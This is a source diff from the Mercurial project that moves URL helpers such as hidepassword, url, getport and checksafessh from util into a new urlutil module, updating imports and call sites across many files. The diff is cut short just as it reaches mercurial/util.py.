diff --git a/hgext/fetch.py b/hgext/fetch.py --- a/hgext/fetch.py +++ b/hgext/fetch.py @@ -19,9 +19,11 @@ lock, pycompat, registrar, - util, ) -from mercurial.utils import dateutil +from mercurial.utils import ( + dateutil, + urlutil, +) release = lock.release cmdtable = {} @@ -109,7 +111,8 @@ other = hg.peer(repo, opts, ui.expandpath(source)) ui.status( - _(b'pulling from %s\n') % util.hidepassword(ui.expandpath(source)) + _(b'pulling from %s\n') + % urlutil.hidepassword(ui.expandpath(source)) ) revs = None if opts[b'rev']: @@ -180,7 +183,7 @@ if not err: # we don't translate commit messages message = cmdutil.logmessage(ui, opts) or ( - b'Automated merge with %s' % util.removeauth(other.url()) + b'Automated merge with %s' % urlutil.removeauth(other.url()) ) editopt = opts.get(b'edit') or opts.get(b'force_editor') editor = cmdutil.getcommiteditor(edit=editopt, editform=b'fetch') diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -242,6 +242,7 @@ from mercurial.utils import ( dateutil, stringutil, + urlutil, ) pickle = util.pickle @@ -1042,7 +1043,7 @@ opts = {} dest = ui.expandpath(remote or b'default-push', remote or b'default') dest, branches = hg.parseurl(dest, None)[:2] - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) revs, checkout = hg.addbranchrevs(repo, repo, branches, None) other = hg.peer(repo, opts, dest) diff --git a/hgext/largefiles/basestore.py b/hgext/largefiles/basestore.py --- a/hgext/largefiles/basestore.py +++ b/hgext/largefiles/basestore.py @@ -12,6 +12,9 @@ from mercurial.i18n import _ from mercurial import node, util +from mercurial.utils import ( + urlutil, +) from . 
import lfutil @@ -29,13 +32,13 @@ def longmessage(self): return _(b"error getting id %s from url %s for file %s: %s\n") % ( self.hash, - util.hidepassword(self.url), + urlutil.hidepassword(self.url), self.filename, self.detail, ) def __str__(self): - return b"%s: %s" % (util.hidepassword(self.url), self.detail) + return b"%s: %s" % (urlutil.hidepassword(self.url), self.detail) class basestore(object): @@ -79,7 +82,7 @@ if not available.get(hash): ui.warn( _(b'%s: largefile %s not available from %s\n') - % (filename, hash, util.hidepassword(self.url)) + % (filename, hash, urlutil.hidepassword(self.url)) ) missing.append(filename) continue diff --git a/hgext/largefiles/remotestore.py b/hgext/largefiles/remotestore.py --- a/hgext/largefiles/remotestore.py +++ b/hgext/largefiles/remotestore.py @@ -15,7 +15,10 @@ util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) from . import ( basestore, @@ -40,11 +43,11 @@ if self.sendfile(source, hash): raise error.Abort( _(b'remotestore: could not put %s to remote store %s') - % (source, util.hidepassword(self.url)) + % (source, urlutil.hidepassword(self.url)) ) self.ui.debug( _(b'remotestore: put %s to remote store %s\n') - % (source, util.hidepassword(self.url)) + % (source, urlutil.hidepassword(self.url)) ) def exists(self, hashes): @@ -80,7 +83,7 @@ # keep trying with the other files... they will probably # all fail too. raise error.Abort( - b'%s: %s' % (util.hidepassword(self.url), e.reason) + b'%s: %s' % (urlutil.hidepassword(self.url), e.reason) ) except IOError as e: raise basestore.StoreError( diff --git a/hgext/largefiles/storefactory.py b/hgext/largefiles/storefactory.py --- a/hgext/largefiles/storefactory.py +++ b/hgext/largefiles/storefactory.py @@ -12,6 +12,9 @@ hg, util, ) +from mercurial.utils import ( + urlutil, +) from . 
import ( lfutil, @@ -71,7 +74,7 @@ raise error.Abort( _(b'%s does not appear to be a largefile store') - % util.hidepassword(path) + % urlutil.hidepassword(path) ) diff --git a/hgext/lfs/blobstore.py b/hgext/lfs/blobstore.py --- a/hgext/lfs/blobstore.py +++ b/hgext/lfs/blobstore.py @@ -31,7 +31,10 @@ worker, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) from ..largefiles import lfutil @@ -725,7 +728,7 @@ https://github.com/git-lfs/git-lfs/blob/master/docs/api/server-discovery.md """ lfsurl = repo.ui.config(b'lfs', b'url') - url = util.url(lfsurl or b'') + url = urlutil.url(lfsurl or b'') if lfsurl is None: if remote: path = remote @@ -739,7 +742,7 @@ # and fall back to inferring from 'paths.remote' if unspecified. path = repo.ui.config(b'paths', b'default') or b'' - defaulturl = util.url(path) + defaulturl = urlutil.url(path) # TODO: support local paths as well. # TODO: consider the ssh -> https transformation that git applies @@ -748,7 +751,7 @@ defaulturl.path += b'/' defaulturl.path = (defaulturl.path or b'') + b'.git/info/lfs' - url = util.url(bytes(defaulturl)) + url = urlutil.url(bytes(defaulturl)) repo.ui.note(_(b'lfs: assuming remote store: %s\n') % url) scheme = url.scheme diff --git a/hgext/mq.py b/hgext/mq.py --- a/hgext/mq.py +++ b/hgext/mq.py @@ -108,6 +108,7 @@ from mercurial.utils import ( dateutil, stringutil, + urlutil, ) release = lockmod.release @@ -2509,7 +2510,7 @@ ) filename = normname(filename) self.checkreservedname(filename) - if util.url(filename).islocal(): + if urlutil.url(filename).islocal(): originpath = self.join(filename) if not os.path.isfile(originpath): raise error.Abort( diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -36,6 +36,9 @@ util, wireprototypes, ) +from mercurial.utils import ( + urlutil, +) table = {} command = registrar.command(table) @@ -592,7 +595,7 @@ # also 
define the set of revisions to update for widening. remotepath = ui.expandpath(remotepath or b'default') url, branches = hg.parseurl(remotepath) - ui.status(_(b'comparing with %s\n') % util.hidepassword(url)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) remote = hg.peer(repo, opts, url) try: diff --git a/hgext/patchbomb.py b/hgext/patchbomb.py --- a/hgext/patchbomb.py +++ b/hgext/patchbomb.py @@ -99,7 +99,10 @@ templater, util, ) -from mercurial.utils import dateutil +from mercurial.utils import ( + dateutil, + urlutil, +) stringio = util.stringio @@ -529,7 +532,7 @@ ui = repo.ui url = ui.expandpath(dest or b'default-push', dest or b'default') url = hg.parseurl(url)[0] - ui.status(_(b'comparing with %s\n') % util.hidepassword(url)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) revs = [r for r in revs if r >= 0] if not revs: diff --git a/hgext/phabricator.py b/hgext/phabricator.py --- a/hgext/phabricator.py +++ b/hgext/phabricator.py @@ -103,6 +103,7 @@ from mercurial.utils import ( procutil, stringutil, + urlutil, ) from . import show @@ -366,7 +367,7 @@ process(k, v) process(b'', params) - return util.urlreq.urlencode(flatparams) + return urlutil.urlreq.urlencode(flatparams) def readurltoken(ui): @@ -381,7 +382,7 @@ _(b'config %s.%s is required') % (b'phabricator', b'url') ) - res = httpconnectionmod.readauthforuri(ui, url, util.url(url).user) + res = httpconnectionmod.readauthforuri(ui, url, urlutil.url(url).user) token = None if res: diff --git a/hgext/schemes.py b/hgext/schemes.py --- a/hgext/schemes.py +++ b/hgext/schemes.py @@ -52,7 +52,9 @@ pycompat, registrar, templater, - util, +) +from mercurial.utils import ( + urlutil, ) cmdtable = {} @@ -86,7 +88,7 @@ ) def resolve(self, url): - # Should this use the util.url class, or is manual parsing better? + # Should this use the urlutil.url class, or is manual parsing better? 
try: url = url.split(b'://', 1)[1] except IndexError: @@ -137,7 +139,7 @@ ) hg.schemes[scheme] = ShortRepository(url, scheme, t) - extensions.wrapfunction(util, b'hasdriveletter', hasdriveletter) + extensions.wrapfunction(urlutil, b'hasdriveletter', hasdriveletter) @command(b'debugexpandscheme', norepo=True) diff --git a/mercurial/bookmarks.py b/mercurial/bookmarks.py --- a/mercurial/bookmarks.py +++ b/mercurial/bookmarks.py @@ -27,6 +27,9 @@ txnutil, util, ) +from .utils import ( + urlutil, +) # label constants # until 3.5, bookmarks.current was the advertised name, not @@ -597,10 +600,10 @@ # try to use an @pathalias suffix # if an @pathalias already exists, we overwrite (update) it if path.startswith(b"file:"): - path = util.url(path).path + path = urlutil.url(path).path for p, u in ui.configitems(b"paths"): if u.startswith(b"file:"): - u = util.url(u).path + u = urlutil.url(u).path if path == u: return b'%s@%s' % (b, p) diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -177,7 +177,10 @@ url, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -2073,7 +2076,7 @@ raw_url = inpart.params[b'url'] except KeyError: raise error.Abort(_(b'remote-changegroup: missing "%s" param') % b'url') - parsed_url = util.url(raw_url) + parsed_url = urlutil.url(raw_url) if parsed_url.scheme not in capabilities[b'remote-changegroup']: raise error.Abort( _(b'remote-changegroup does not support %s urls') @@ -2110,7 +2113,7 @@ cg = exchange.readbundle(op.repo.ui, real_part, raw_url) if not isinstance(cg, changegroup.cg1unpacker): raise error.Abort( - _(b'%s: not a bundle version 1.0') % util.hidepassword(raw_url) + _(b'%s: not a bundle version 1.0') % urlutil.hidepassword(raw_url) ) ret = _processchangegroup(op, cg, tr, op.source, b'bundle2') if op.reply is not None: @@ -2126,7 +2129,7 @@ except error.Abort as e: raise error.Abort( _(b'bundle 
at %s is corrupted:\n%s') - % (util.hidepassword(raw_url), e.message) + % (urlutil.hidepassword(raw_url), e.message) ) assert not inpart.read() diff --git a/mercurial/bundlerepo.py b/mercurial/bundlerepo.py --- a/mercurial/bundlerepo.py +++ b/mercurial/bundlerepo.py @@ -43,6 +43,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) class bundlerevlog(revlog.revlog): @@ -475,7 +478,7 @@ cwd = pathutil.normasprefix(cwd) if parentpath.startswith(cwd): parentpath = parentpath[len(cwd) :] - u = util.url(path) + u = urlutil.url(path) path = u.localpath() if u.scheme == b'bundle': s = path.split(b"+", 1) diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -74,6 +74,7 @@ from .utils import ( dateutil, stringutil, + urlutil, ) if pycompat.TYPE_CHECKING: @@ -4318,7 +4319,7 @@ ui.warn(_(b"remote doesn't support bookmarks\n")) return 0 ui.pager(b'incoming') - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source)) return bookmarks.incoming(ui, repo, other) finally: other.close() @@ -4993,7 +4994,7 @@ if b'bookmarks' not in other.listkeys(b'namespaces'): ui.warn(_(b"remote doesn't support bookmarks\n")) return 0 - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) ui.pager(b'outgoing') return bookmarks.outgoing(ui, repo, other) finally: @@ -5141,7 +5142,7 @@ fm = ui.formatter(b'paths', opts) if fm.isplain(): - hidepassword = util.hidepassword + hidepassword = urlutil.hidepassword else: hidepassword = bytes if ui.quiet: @@ -5391,7 +5392,7 @@ source, branches = hg.parseurl( ui.expandpath(source), opts.get(b'branch') ) - ui.status(_(b'pulling from %s\n') % util.hidepassword(source)) + ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(source)) ui.flush() other = hg.peer(repo, opts, source) update_conflict = None @@ -5731,7 +5732,7 @@ ) dest = 
path.pushloc or path.loc branches = (path.branch, opts.get(b'branch') or []) - ui.status(_(b'pushing to %s\n') % util.hidepassword(dest)) + ui.status(_(b'pushing to %s\n') % urlutil.hidepassword(dest)) revs, checkout = hg.addbranchrevs( repo, repo, branches, opts.get(b'rev') ) @@ -7228,7 +7229,7 @@ revs, checkout = hg.addbranchrevs(repo, other, branches, None) if revs: revs = [other.lookup(rev) for rev in revs] - ui.debug(b'comparing with %s\n' % util.hidepassword(source)) + ui.debug(b'comparing with %s\n' % urlutil.hidepassword(source)) repo.ui.pushbuffer() commoninc = discovery.findcommonincoming(repo, other, heads=revs) repo.ui.popbuffer() @@ -7250,7 +7251,7 @@ if opts.get(b'remote'): raise return dest, dbranch, None, None - ui.debug(b'comparing with %s\n' % util.hidepassword(dest)) + ui.debug(b'comparing with %s\n' % urlutil.hidepassword(dest)) elif sother is None: # there is no explicit destination peer, but source one is invalid return dest, dbranch, None, None @@ -7592,7 +7593,7 @@ try: txnname = b'unbundle' if not isinstance(gen, bundle2.unbundle20): - txnname = b'unbundle\n%s' % util.hidepassword(url) + txnname = b'unbundle\n%s' % urlutil.hidepassword(url) with repo.transaction(txnname) as tr: op = bundle2.applybundle( repo, gen, tr, source=b'unbundle', url=url diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -98,6 +98,7 @@ dateutil, procutil, stringutil, + urlutil, ) from .revlogutils import ( @@ -1061,7 +1062,7 @@ remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl)) remote = hg.peer(repo, opts, remoteurl) - ui.status(_(b'comparing with %s\n') % util.hidepassword(remoteurl)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(remoteurl)) else: branches = (None, []) remote_filtered_revs = scmutil.revrange( @@ -3652,7 +3653,7 @@ source = b"default" source, branches = hg.parseurl(ui.expandpath(source)) - url = util.url(source) + url = urlutil.url(source) 
defaultport = {b'https': 443, b'ssh': 22} if url.scheme in defaultport: @@ -4525,7 +4526,7 @@ # We bypass hg.peer() so we can proxy the sockets. # TODO consider not doing this because we skip # ``hg.wirepeersetupfuncs`` and potentially other useful functionality. - u = util.url(path) + u = urlutil.url(path) if u.scheme != b'http': raise error.Abort(_(b'only http:// paths are currently supported')) diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -42,6 +42,7 @@ from .utils import ( hashutil, stringutil, + urlutil, ) urlerr = util.urlerr @@ -1465,7 +1466,7 @@ def transaction(self): """Return an open transaction object, constructing if necessary""" if not self._tr: - trname = b'%s\n%s' % (self.source, util.hidepassword(self.url)) + trname = b'%s\n%s' % (self.source, urlutil.hidepassword(self.url)) self._tr = self.repo.transaction(trname) self._tr.hookargs[b'source'] = self.source self._tr.hookargs[b'url'] = self.url @@ -2647,7 +2648,7 @@ # push can proceed if not isinstance(cg, bundle2.unbundle20): # legacy case: bundle1 (changegroup 01) - txnname = b"\n".join([source, util.hidepassword(url)]) + txnname = b"\n".join([source, urlutil.hidepassword(url)]) with repo.lock(), repo.transaction(txnname) as tr: op = bundle2.applybundle(repo, cg, tr, source, url) r = bundle2.combinechangegroupresults(op) diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -55,6 +55,7 @@ from .utils import ( hashutil, stringutil, + urlutil, ) @@ -65,7 +66,7 @@ def _local(path): - path = util.expandpath(util.urllocalpath(path)) + path = util.expandpath(urlutil.urllocalpath(path)) try: # we use os.stat() directly here instead of os.path.isfile() @@ -132,7 +133,7 @@ def parseurl(path, branches=None): '''parse url#branch, returning (url, (branch, branches))''' - u = util.url(path) + u = urlutil.url(path) branch = None if u.fragment: branch = u.fragment @@ -152,7 +153,7 @@ def 
_peerlookup(path): - u = util.url(path) + u = urlutil.url(path) scheme = u.scheme or b'file' thing = schemes.get(scheme) or schemes[b'file'] try: @@ -177,7 +178,7 @@ def openpath(ui, path, sendaccept=True): '''open path with open if local, url.open if remote''' - pathurl = util.url(path, parsequery=False, parsefragment=False) + pathurl = urlutil.url(path, parsequery=False, parsefragment=False) if pathurl.islocal(): return util.posixfile(pathurl.localpath(), b'rb') else: @@ -265,7 +266,7 @@ >>> defaultdest(b'http://example.org/foo/') 'foo' """ - path = util.url(source).path + path = urlutil.url(source).path if not path: return b'' return os.path.basename(os.path.normpath(path)) @@ -571,7 +572,7 @@ # Resolve the value to put in [paths] section for the source. if islocal(source): - defaultpath = os.path.abspath(util.urllocalpath(source)) + defaultpath = os.path.abspath(urlutil.urllocalpath(source)) else: defaultpath = source @@ -693,8 +694,8 @@ else: dest = ui.expandpath(dest) - dest = util.urllocalpath(dest) - source = util.urllocalpath(source) + dest = urlutil.urllocalpath(dest) + source = urlutil.urllocalpath(source) if not dest: raise error.InputError(_(b"empty destination path is not valid")) @@ -825,7 +826,7 @@ abspath = origsource if islocal(origsource): - abspath = os.path.abspath(util.urllocalpath(origsource)) + abspath = os.path.abspath(urlutil.urllocalpath(origsource)) if islocal(dest): cleandir = dest @@ -939,7 +940,7 @@ local.setnarrowpats(storeincludepats, storeexcludepats) narrowspec.copytoworkingcopy(local) - u = util.url(abspath) + u = urlutil.url(abspath) defaulturl = bytes(u) local.ui.setconfig(b'paths', b'default', defaulturl, b'clone') if not stream: @@ -986,7 +987,7 @@ destrepo = destpeer.local() if destrepo: template = uimod.samplehgrcs[b'cloned'] - u = util.url(abspath) + u = urlutil.url(abspath) u.passwd = None defaulturl = bytes(u) destrepo.vfs.write(b'hgrc', util.tonativeeol(template % defaulturl)) @@ -1269,7 +1270,7 @@ other = peer(repo, 
opts, source) cleanupfn = other.close try: - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source)) revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev')) if revs: @@ -1330,7 +1331,7 @@ dest = path.pushloc or path.loc branches = path.branch, opts.get(b'branch') or [] - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev')) if revs: revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)] diff --git a/mercurial/hgweb/request.py b/mercurial/hgweb/request.py --- a/mercurial/hgweb/request.py +++ b/mercurial/hgweb/request.py @@ -17,6 +17,9 @@ pycompat, util, ) +from ..utils import ( + urlutil, +) class multidict(object): @@ -184,7 +187,7 @@ reponame = env.get(b'REPO_NAME') if altbaseurl: - altbaseurl = util.url(altbaseurl) + altbaseurl = urlutil.url(altbaseurl) # https://www.python.org/dev/peps/pep-0333/#environ-variables defines # the environment variables. 
diff --git a/mercurial/hgweb/server.py b/mercurial/hgweb/server.py --- a/mercurial/hgweb/server.py +++ b/mercurial/hgweb/server.py @@ -28,6 +28,9 @@ pycompat, util, ) +from ..utils import ( + urlutil, +) httpservermod = util.httpserver socketserver = util.socketserver @@ -431,7 +434,7 @@ sys.setdefaultencoding(oldenc) address = ui.config(b'web', b'address') - port = util.getport(ui.config(b'web', b'port')) + port = urlutil.getport(ui.config(b'web', b'port')) try: return cls(ui, app, (address, port), handler) except socket.error as inst: diff --git a/mercurial/httpconnection.py b/mercurial/httpconnection.py --- a/mercurial/httpconnection.py +++ b/mercurial/httpconnection.py @@ -18,6 +18,10 @@ pycompat, util, ) +from .utils import ( + urlutil, +) + urlerr = util.urlerr urlreq = util.urlreq @@ -99,7 +103,7 @@ if not prefix: continue - prefixurl = util.url(prefix) + prefixurl = urlutil.url(prefix) if prefixurl.user and prefixurl.user != user: # If a username was set in the prefix, it must match the username in # the URI. diff --git a/mercurial/httppeer.py b/mercurial/httppeer.py --- a/mercurial/httppeer.py +++ b/mercurial/httppeer.py @@ -38,6 +38,7 @@ from .utils import ( cborutil, stringutil, + urlutil, ) httplib = util.httplib @@ -305,7 +306,7 @@ except httplib.HTTPException as inst: ui.debug( b'http error requesting %s\n' - % util.hidepassword(req.get_full_url()) + % urlutil.hidepassword(req.get_full_url()) ) ui.traceback() raise IOError(None, inst) @@ -352,14 +353,14 @@ except AttributeError: proto = pycompat.bytesurl(resp.headers.get('content-type', '')) - safeurl = util.hidepassword(baseurl) + safeurl = urlutil.hidepassword(baseurl) if proto.startswith(b'application/hg-error'): raise error.OutOfBandError(resp.read()) # Pre 1.0 versions of Mercurial used text/plain and # application/hg-changegroup. We don't support such old servers. 
if not proto.startswith(b'application/mercurial-'): - ui.debug(b"requested URL: '%s'\n" % util.hidepassword(requrl)) + ui.debug(b"requested URL: '%s'\n" % urlutil.hidepassword(requrl)) msg = _( b"'%s' does not appear to be an hg repository:\n" b"---%%<--- (%s)\n%s\n---%%<---\n" @@ -1058,7 +1059,7 @@ ``requestbuilder`` is the type used for constructing HTTP requests. It exists as an argument so extensions can override the default. """ - u = util.url(path) + u = urlutil.url(path) if u.query or u.fragment: raise error.Abort( _(b'unsupported URL component: "%s"') % (u.query or u.fragment) diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -84,6 +84,7 @@ hashutil, procutil, stringutil, + urlutil, ) from .revlogutils import ( @@ -3401,7 +3402,7 @@ def instance(ui, path, create, intents=None, createopts=None): - localpath = util.urllocalpath(path) + localpath = urlutil.urllocalpath(path) if create: createrepository(ui, localpath, createopts=createopts) diff --git a/mercurial/logexchange.py b/mercurial/logexchange.py --- a/mercurial/logexchange.py +++ b/mercurial/logexchange.py @@ -15,6 +15,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) # directory name in .hg/ in which remotenames files will be present remotenamedir = b'logexchange' @@ -117,7 +120,7 @@ # represent the remotepath with user defined path name if exists for path, url in repo.ui.configitems(b'paths'): # remove auth info from user defined url - noauthurl = util.removeauth(url) + noauthurl = urlutil.removeauth(url) # Standardize on unix style paths, otherwise some {remotenames} end up # being an absolute path on Windows. 
diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -34,6 +34,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) if pycompat.TYPE_CHECKING: @@ -139,7 +140,7 @@ defaultport = 465 else: defaultport = 25 - mailport = util.getport(ui.config(b'smtp', b'port', defaultport)) + mailport = urlutil.getport(ui.config(b'smtp', b'port', defaultport)) ui.note(_(b'sending mail: smtp host %s, port %d\n') % (mailhost, mailport)) s.connect(host=mailhost, port=mailport) if starttls: diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -28,11 +28,11 @@ pycompat, requirements, scmutil, - util, ) from .utils import ( hashutil, stringutil, + urlutil, ) @@ -245,7 +245,7 @@ tmpbundleurl = b'bundle:' + vfs.join(tmpbundlefile) txnname = b'strip' if not isinstance(gen, bundle2.unbundle20): - txnname = b"strip\n%s" % util.hidepassword(tmpbundleurl) + txnname = b"strip\n%s" % urlutil.hidepassword(tmpbundleurl) with repo.transaction(txnname) as tr: bundle2.applybundle( repo, gen, tr, source=b'strip', url=tmpbundleurl diff --git a/mercurial/server.py b/mercurial/server.py --- a/mercurial/server.py +++ b/mercurial/server.py @@ -22,7 +22,10 @@ util, ) -from .utils import procutil +from .utils import ( + procutil, + urlutil, +) def runservice( @@ -184,7 +187,7 @@ def _createhgwebservice(ui, repo, opts): # this way we can check if something was given in the command-line if opts.get(b'port'): - opts[b'port'] = util.getport(opts.get(b'port')) + opts[b'port'] = urlutil.getport(opts.get(b'port')) alluis = {ui} if repo: diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -24,6 +24,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) @@ -662,11 +663,11 @@ The returned object conforms to the ``wireprotov1peer.wirepeer`` interface. 
""" - u = util.url(path, parsequery=False, parsefragment=False) + u = urlutil.url(path, parsequery=False, parsefragment=False) if u.scheme != b'ssh' or not u.host or u.path is None: raise error.RepoError(_(b"couldn't parse location %s") % path) - util.checksafessh(path) + urlutil.checksafessh(path) if u.passwd is not None: raise error.RepoError(_(b'password in URL not supported')) diff --git a/mercurial/statichttprepo.py b/mercurial/statichttprepo.py --- a/mercurial/statichttprepo.py +++ b/mercurial/statichttprepo.py @@ -26,6 +26,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -162,7 +165,7 @@ self.ui = ui self.root = path - u = util.url(path.rstrip(b'/') + b"/.hg") + u = urlutil.url(path.rstrip(b'/') + b"/.hg") self.path, authinfo = u.authinfo() vfsclass = build_opener(ui, authinfo) diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -44,6 +44,7 @@ dateutil, hashutil, procutil, + urlutil, ) hg = None @@ -57,8 +58,8 @@ """ get a path or url and if it is a path expand it and return an absolute path """ - expandedpath = util.urllocalpath(util.expandpath(path)) - u = util.url(expandedpath) + expandedpath = urlutil.urllocalpath(util.expandpath(path)) + u = urlutil.url(expandedpath) if not u.scheme: path = util.normpath(os.path.abspath(u.path)) return path @@ -745,7 +746,7 @@ self.ui.status( _(b'cloning subrepo %s from %s\n') - % (subrelpath(self), util.hidepassword(srcurl)) + % (subrelpath(self), urlutil.hidepassword(srcurl)) ) peer = getpeer() try: @@ -765,7 +766,7 @@ else: self.ui.status( _(b'pulling subrepo %s from %s\n') - % (subrelpath(self), util.hidepassword(srcurl)) + % (subrelpath(self), urlutil.hidepassword(srcurl)) ) cleansub = self.storeclean(srcurl) peer = getpeer() @@ -849,12 +850,12 @@ if self.storeclean(dsturl): self.ui.status( _(b'no changes made to subrepo %s since last push to %s\n') - % (subrelpath(self), 
util.hidepassword(dsturl)) + % (subrelpath(self), urlutil.hidepassword(dsturl)) ) return None self.ui.status( _(b'pushing subrepo %s to %s\n') - % (subrelpath(self), util.hidepassword(dsturl)) + % (subrelpath(self), urlutil.hidepassword(dsturl)) ) other = hg.peer(self._repo, {b'ssh': ssh}, dsturl) try: @@ -1284,7 +1285,7 @@ args.append(b'%s@%s' % (state[0], state[1])) # SEC: check that the ssh url is safe - util.checksafessh(state[0]) + urlutil.checksafessh(state[0]) status, err = self._svncommand(args, failok=True) _sanitize(self.ui, self.wvfs, b'.svn') @@ -1582,7 +1583,7 @@ def _fetch(self, source, revision): if self._gitmissing(): # SEC: check for safe ssh url - util.checksafessh(source) + urlutil.checksafessh(source) source = self._abssource(source) self.ui.status( diff --git a/mercurial/subrepoutil.py b/mercurial/subrepoutil.py --- a/mercurial/subrepoutil.py +++ b/mercurial/subrepoutil.py @@ -23,7 +23,10 @@ pycompat, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) nullstate = (b'', b'', b'empty') @@ -136,10 +139,10 @@ kind = kind[1:] src = src.lstrip() # strip any extra whitespace after ']' - if not util.url(src).isabs(): + if not urlutil.url(src).isabs(): parent = _abssource(repo, abort=False) if parent: - parent = util.url(parent) + parent = urlutil.url(parent) parent.path = posixpath.join(parent.path or b'', src) parent.path = posixpath.normpath(parent.path) joined = bytes(parent) @@ -400,13 +403,13 @@ """return pull/push path of repo - either based on parent repo .hgsub info or on the top repo config. 
Abort or return None if no source found.""" if util.safehasattr(repo, b'_subparent'): - source = util.url(repo._subsource) + source = urlutil.url(repo._subsource) if source.isabs(): return bytes(source) source.path = posixpath.normpath(source.path) parent = _abssource(repo._subparent, push, abort=False) if parent: - parent = util.url(util.pconvert(parent)) + parent = urlutil.url(util.pconvert(parent)) parent.path = posixpath.join(parent.path or b'', source.path) parent.path = posixpath.normpath(parent.path) return bytes(parent) @@ -435,7 +438,7 @@ # # D:\>python -c "import os; print os.path.abspath('C:relative')" # C:\some\path\relative - if util.hasdriveletter(path): + if urlutil.hasdriveletter(path): if len(path) == 2 or path[2:3] not in br'\/': path = os.path.abspath(path) return path diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -559,7 +559,7 @@ ) p = p.replace(b'%%', b'%') p = util.expandpath(p) - if not util.hasscheme(p) and not os.path.isabs(p): + if not urlutil.hasscheme(p) and not os.path.isabs(p): p = os.path.normpath(os.path.join(root, p)) c.alter(b"paths", n, p) diff --git a/mercurial/url.py b/mercurial/url.py --- a/mercurial/url.py +++ b/mercurial/url.py @@ -26,7 +26,10 @@ urllibcompat, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) httplib = util.httplib stringio = util.stringio @@ -75,17 +78,17 @@ user, passwd = auth.get(b'username'), auth.get(b'password') self.ui.debug(b"using auth.%s.* for authentication\n" % group) if not user or not passwd: - u = util.url(pycompat.bytesurl(authuri)) + u = urlutil.url(pycompat.bytesurl(authuri)) u.query = None if not self.ui.interactive(): raise error.Abort( _(b'http authorization required for %s') - % util.hidepassword(bytes(u)) + % urlutil.hidepassword(bytes(u)) ) self.ui.write( _(b"http authorization required for %s\n") - % util.hidepassword(bytes(u)) + % urlutil.hidepassword(bytes(u)) ) self.ui.write(_(b"realm: %s\n") % 
pycompat.bytesurl(realm)) if user: @@ -128,7 +131,7 @@ proxyurl.startswith(b'http:') or proxyurl.startswith(b'https:') ): proxyurl = b'http://' + proxyurl + b'/' - proxy = util.url(proxyurl) + proxy = urlutil.url(proxyurl) if not proxy.user: proxy.user = ui.config(b"http_proxy", b"user") proxy.passwd = ui.config(b"http_proxy", b"passwd") @@ -155,7 +158,9 @@ # expects them to be. proxyurl = str(proxy) proxies = {'http': proxyurl, 'https': proxyurl} - ui.debug(b'proxying through %s\n' % util.hidepassword(bytes(proxy))) + ui.debug( + b'proxying through %s\n' % urlutil.hidepassword(bytes(proxy)) + ) else: proxies = {} @@ -219,7 +224,7 @@ new_tunnel = False if new_tunnel or tunnel_host == urllibcompat.getfullurl(req): # has proxy - u = util.url(pycompat.bytesurl(tunnel_host)) + u = urlutil.url(pycompat.bytesurl(tunnel_host)) if new_tunnel or u.scheme == b'https': # only use CONNECT for HTTPS h.realhostport = b':'.join([u.host, (u.port or b'443')]) h.headers = req.headers.copy() @@ -675,7 +680,7 @@ def open(ui, url_, data=None, sendaccept=True): - u = util.url(url_) + u = urlutil.url(url_) if u.scheme: u.scheme = u.scheme.lower() url_, authinfo = u.authinfo() diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -28,7 +28,6 @@ 